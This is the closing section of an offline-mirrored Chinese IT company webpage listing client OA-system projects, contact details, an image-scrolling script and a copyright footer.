        	<div class="mr_title"><a href="javascript:void(0);" id="mrm1" onmouseover="mrL_change('1');">教学大纲</a><a href="javascript:void(0);" id="mrm2" onmouseover="mrR_change('2');" class="mr_selR">业务联系</a>
            </div>
            <div class="mr_main">
            	<div class="mr_main1" id="nn1">
                	<a href="CaseList.html" tppabs="http://www.ibmtech.com.cn/CaseList.html">山西美特好OA系统</a>
                    <a href="CaseList.html" tppabs="http://www.ibmtech.com.cn/CaseList.html">某国家部委邮件OA邮件升级</a>
                    <a href="CaseList.html" tppabs="http://www.ibmtech.com.cn/CaseList.html">某商业银行内部协同办公系统</a>
                    <a href="CaseList.html" tppabs="http://www.ibmtech.com.cn/CaseList.html">财政部内部办公网门户系统</a>
                    <a href="CaseList.html" tppabs="http://www.ibmtech.com.cn/CaseList.html">某财政厅门户</a>
                    <a href="CaseList.html" tppabs="http://www.ibmtech.com.cn/CaseList.html">国家质检总局在线学习系统</a>
                    <a href="javascript:if(confirm('http://www.tzrhro.com/  \n\n�ļ���δ�� Teleport Pro ȡ�أ���Ϊ �������·��������ʼ��ַ�����õķ�Χ��  \n\n��Ҫ�ӷ������ϴ�����'))window.location='http://www.tzrhro.com/'" tppabs="http://www.tzrhro.com/">山西同至人英才网</a>
                </div>
                <div class="mr_main2" id="nn2" style="display:none;">
                	<p style="background:url(images/dianhua.gif) no-repeat left center;">010-62981506</p>
                    <p style="background:url(images/chuanzhen.gif) no-repeat left center;">010-62981506</p>
                    <p style="background:url(images/qq.gif) no-repeat left center;">2861673305</p>
                    <p style="background:url(images/msn.gif) no-repeat left center;">[email protected]</p>
                    <p style="background:url(images/mail.gif) no-repeat left center;">[email protected]</p>
                    <p style="background:url(images/dizhi.gif) no-repeat left center;">北京市海淀区上地嘉华大厦A座510室</p>
                </div>
            </div>
        </div>
        <div class="clear"></div>
        <!--图片向右滚动开始-->
        <div id="colee_right" style="overflow:hidden; width:982px;">
            <table cellpadding="0" cellspacing="0" border="0">
                <tr>
                	<td id="colee_right1" valign="top" align="center">
                        <table cellpadding="2" cellspacing="0" border="0" style="margin:3px 0 0 0px;">
                            <tr align="center">
                                <td><a href="yiliao.html" tppabs="http://www.ibmtech.com.cn/yiliao.html"><img src="gun_01.jpg" tppabs="http://www.ibmtech.com.cn/images/gun_01.jpg" style="border:none;"></a></td>
                                <td><a href="chengshi.html" tppabs="http://www.ibmtech.com.cn/chengshi.html"><img src="gun_02.jpg" tppabs="http://www.ibmtech.com.cn/images/gun_02.jpg" style="border:none;"></a></td>
                                <td><a href="zhengfu.html" tppabs="http://www.ibmtech.com.cn/zhengfu.html"><img src="gun_03.jpg" tppabs="http://www.ibmtech.com.cn/images/gun_03.jpg" style="border:none;"></a></td>
                                <td><a href="shangwu.html" tppabs="http://www.ibmtech.com.cn/shangwu.html"><img src="gun_04.jpg" tppabs="http://www.ibmtech.com.cn/images/gun_04.jpg" style="border:none;"></a></td>
                                <td><a href="tielu.html" tppabs="http://www.ibmtech.com.cn/tielu.html"><img src="gun_05.jpg" tppabs="http://www.ibmtech.com.cn/images/gun_05.jpg" style="border:none;"></a></td>
                                <td><a href="yinhang.html" tppabs="http://www.ibmtech.com.cn/yinhang.html"><img src="gun_06.jpg" tppabs="http://www.ibmtech.com.cn/images/gun_06.jpg" style="border:none;"></a></td>
                                <td><a href="lingshou.html" tppabs="http://www.ibmtech.com.cn/lingshou.html"><img src="gun_07.jpg" tppabs="http://www.ibmtech.com.cn/images/gun_07.jpg" style="border:none;"></a></td>
                            </tr>
                        </table>
                	</td>
                	<td id="colee_right2" valign="top"></td>
                </tr>
            </table>
        </div>
        <script>
var speed=50//速度数值越大速度越慢
var colee_right2=document.getElementById("colee_right2");
var colee_right1=document.getElementById("colee_right1");
var colee_right=document.getElementById("colee_right");
colee_right2.innerHTML=colee_right1.innerHTML
function Marquee4(){
if(colee_right.scrollLeft<=0)
colee_right.scrollLeft+=colee_right2.offsetWidth
else{
colee_right.scrollLeft--
}
}
var MyMar4=setInterval(Marquee4,speed)
colee_right.onmouseover=function() {clearInterval(MyMar4)}
colee_right.onmouseout=function() {MyMar4=setInterval(Marquee4,speed)}
</script>
    </div>
    <!--部尾开始(包含版权信息,联系方式等)-->
    <div class="footer">
		<p style="padding-top:27px;"><span style="font-family:Arial;">&copy;</span>&nbsp;2009 国信清 All Rights Reserved <a href="https://beian.miit.gov.cn/" target="_blank"> 京ICP备17003704号-1</a> </p>
		<p style="padding-top:5px;">联系电话:010-62981506&nbsp;&nbsp;传真:010-62981506&nbsp;邮箱:[email protected];&nbsp;地址:北京市海淀区上地嘉华大厦A座706室</p>
	</div>
</div>
<script type="text/javascript">
<!--
swfobject.registerObject("FlashID");
//-->
</script>
</body>
</html>
                               

Whois info of domain